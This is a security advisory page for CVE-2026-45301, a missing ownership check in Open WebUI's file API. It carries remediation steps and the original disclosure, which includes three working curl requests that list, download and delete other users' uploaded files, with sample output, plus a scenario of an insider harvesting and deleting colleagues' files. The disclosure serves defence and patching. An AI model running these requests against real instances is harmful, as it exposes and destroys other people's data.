CVE-2026-45301: open-webui: BOLA exposes all users' uploaded files
GHSA-r8wh-8m7r-fh33 HIGH CISA: ATTENDOpen WebUI's file API endpoints perform no ownership verification, allowing any authenticated user to enumerate, download, and delete every file uploaded by every other user on the platform. For organizations running shared Open WebUI instances — the standard deployment model for internal LLM chat platforms — this means proprietary documents, source code, credentials, and sensitive data uploaded by employees are fully visible and deletable by any peer account. The full proof-of-concept is embedded in the public advisory (three curl commands), making exploitation trivial with zero specialized knowledge; CVSS 8.1 with low attack complexity and low privileges required means treat this as actively exploitable from the moment any second user exists on your instance. Upgrade to open-webui 0.3.16 immediately; absent patching, disable file uploads or restrict the deployment to single-user access.
What is the risk?
High risk. CVSS 8.1 with network-accessible attack vector, low complexity, and low privilege requirement makes this exploitable by any registered user. The PoC is publicly embedded in the GitHub advisory — three curl commands covering list, read, and delete. Open WebUI is widely deployed as a shared internal LLM interface, meaning multi-user environments are universally affected. The 91 prior CVEs in this package indicate systemic security maturity concerns. While no CISA KEV listing exists, the trivial exploitation path and public PoC mean weaponization timeline is measured in hours, not days.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Open WebUI | pip | <= 0.3.15 | 0.3.16 |
Do you use Open WebUI? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
Upgrade to open-webui 0.3.16 which adds ownership-based permission checks to all file API endpoints.
-
If immediate patching is blocked, disable file upload functionality or restrict the instance to a single trusted user.
-
Audit HTTP access logs for GET /api/v1/files/ and GET /api/v1/files/{id}/content requests from non-admin accounts to detect prior exfiltration activity.
-
Notify affected users that files they uploaded may have been accessed and initiate data breach assessment per your jurisdiction's notification requirements.
-
Rotate any credentials or sensitive material that may have been uploaded to the platform.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-45301?
Open WebUI's file API endpoints perform no ownership verification, allowing any authenticated user to enumerate, download, and delete every file uploaded by every other user on the platform. For organizations running shared Open WebUI instances — the standard deployment model for internal LLM chat platforms — this means proprietary documents, source code, credentials, and sensitive data uploaded by employees are fully visible and deletable by any peer account. The full proof-of-concept is embedded in the public advisory (three curl commands), making exploitation trivial with zero specialized knowledge; CVSS 8.1 with low attack complexity and low privileges required means treat this as actively exploitable from the moment any second user exists on your instance. Upgrade to open-webui 0.3.16 immediately; absent patching, disable file uploads or restrict the deployment to single-user access.
Is CVE-2026-45301 actively exploited?
No confirmed active exploitation of CVE-2026-45301 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-45301?
1. Upgrade to open-webui 0.3.16 which adds ownership-based permission checks to all file API endpoints. 2. If immediate patching is blocked, disable file upload functionality or restrict the instance to a single trusted user. 3. Audit HTTP access logs for GET /api/v1/files/ and GET /api/v1/files/{id}/content requests from non-admin accounts to detect prior exfiltration activity. 4. Notify affected users that files they uploaded may have been accessed and initiate data breach assessment per your jurisdiction's notification requirements. 5. Rotate any credentials or sensitive material that may have been uploaded to the platform.
What systems are affected by CVE-2026-45301?
This vulnerability affects the following AI/ML architecture patterns: Shared LLM chat platforms, Internal AI assistant deployments, Document-augmented AI workflows, Multi-user AI collaboration environments.
What is the CVSS score for CVE-2026-45301?
CVE-2026-45301 has a CVSS v3.1 base score of 8.1 (HIGH). The EPSS exploitation probability is 0.27%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0012 Valid Accounts AML.T0025 Exfiltration via Cyber Means AML.T0049 Exploit Public-Facing Application AML.T0085 Data from AI Services Compliance Controls Affected
What are the technical details?
Original Advisory
### Summary A missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform. ### Details All `files/` related endpoints lack permission checks. #### Listing all files For example, let's see how file listing is implemented: https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L107-L110 https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/models/files.py#L26 Notice the endpoint depends only on an authenticated user check, no file filtering is done to match the uploaded files' `user_id` to the requesting user. This problem repeats itself throughout the various route implementations, allowing any user to perform actions on any file. Some note worthy functions: #### Accessing the content of any file https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L173-L193 #### Deleting any file https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L224-L241 ### PoC #### Configuration 1. I ran a clean install of the latest version using one of the docker one-liners on an Ubuntu desktop: `docker run -d -p 3000:8080 -v ollama:/root/.ollama -v open-webui:/app/backend/data --name open-webui --restart always ghcr.io/open-webui/open-webui:ollama` 2. I created an admin user 3. I created a second user to act as the threat actor with no elevated permissions 4. Admin user uploaded `test.txt` in a conversation with model 5. Admin user uploaded `mydeepest_secret.docx` in a conversation with model #### Listing files uploaded by other users 1. Login to threat actor 2. Perform a GET request to `/api/v1/files/` ```sh curl -X 'GET' \ 'http://localhost:3000/api/v1/files/' \ -H 'accept: application/json' ``` ```json [ { "id": "b9733e9c-0714-4425-8915-d0361bf66dfc", "user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1", "filename": "b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt", "meta": { "name": "test.txt", "content_type": "text/plain", "size": 4, "path": "/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt" }, "created_at": 1724709202 }, { "id": "8f058e18-fec1-4b9f-bb4e-c17f39d03c98", "user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1", "filename": "8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx", "meta": { "name": "mydeepest_secret.docx", "content_type": "application/vnd.openxmlformats-officedocument.wordprocessingml.document", "size": 6485, "path": "/app/backend/data/uploads/8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx" }, "created_at": 1724710236 } ] ``` #### Accessing other users' file content 1. Login to threat actor 2. Perform a GET request to `/api/v1/files/{id}/content` ```sh curl -X 'GET' \ 'http://localhost:3000/api/v1/files/b9733e9c-0714-4425-8915-d0361bf66dfc/content' \ -H 'accept: application/json' ``` ``` wow ``` #### Deleting another user's uploaded file 1. Login to threat actor 2. Perform a DELETE request to `/api/v1/files/{id}` ```sh curl -X 'DELETE' \ 'http://localhost:3000/api/v1/files/8f058e18-fec1-4b9f-bb4e-c17f39d03c98' \ -H 'accept: application/json' ``` ```json { "message": "File deleted successfully" } ``` 3. We will verify this action by furthur listing all files as mentioned above: ```json [ { "id": "b9733e9c-0714-4425-8915-d0361bf66dfc", "user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1", "filename": "b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt", "meta": { "name": "test.txt", "content_type": "text/plain", "size": 4, "path": "/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt" }, "created_at": 1724709202 } ] ``` ### Impact Having access to user uploaded files, regardless of ownership or permission level, breaks the confidentiality of sensitive data stored by users. Furthermore, the ability to delete other user's uploaded files disrupts the integrity of the system. ### Personal Notice In case this submission does get recognized and numbered as a CVE I'd perfer to be credited by my full name - Yuval Gal, instead of my GitHub handle. Thanks in advance and have a good week (: ## Credits This vulnerability was reported by **Yuval Gal** (GitHub: @vi11ain).
Exploitation Scenario
A malicious insider or attacker with a compromised standard user account on a shared corporate Open WebUI instance authenticates with their credentials. They send a single GET to /api/v1/files/ and receive a full JSON inventory of every file uploaded by every colleague — filenames, file UUIDs, uploader user IDs, and filesystem paths. They iterate over the returned IDs, downloading content via GET /api/v1/files/{id}/content, harvesting proprietary documents, source code, credentials, or PII that colleagues uploaded to their AI chat sessions. Finally, to cover tracks or cause operational disruption, they issue DELETE requests against selected files, eliminating data and potentially destroying evidence of their access. The entire attack requires no AI/ML knowledge — only valid authentication and standard HTTP tooling.
Weaknesses (CWE)
CWE-284 — Improper Access Control: The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
- [Architecture and Design, Operation] Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.
- [Architecture and Design] Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N References
Timeline
Related Vulnerabilities
CVE-2026-44551 9.1 open-webui: LDAP auth bypass — full account takeover
Same package: open-webui CVE-2026-45672 8.8 open-webui: code exec gate bypass via API endpoint
Same package: open-webui CVE-2026-44552 8.7 open-webui: Redis cache poisoning enables cross-instance tool hijack
Same package: open-webui CVE-2025-64495 8.7 Open WebUI: XSS-to-RCE via malicious prompt injection
Same package: open-webui CVE-2026-45315 8.7 open-webui: stored XSS → JWT theft and admin takeover
Same package: open-webui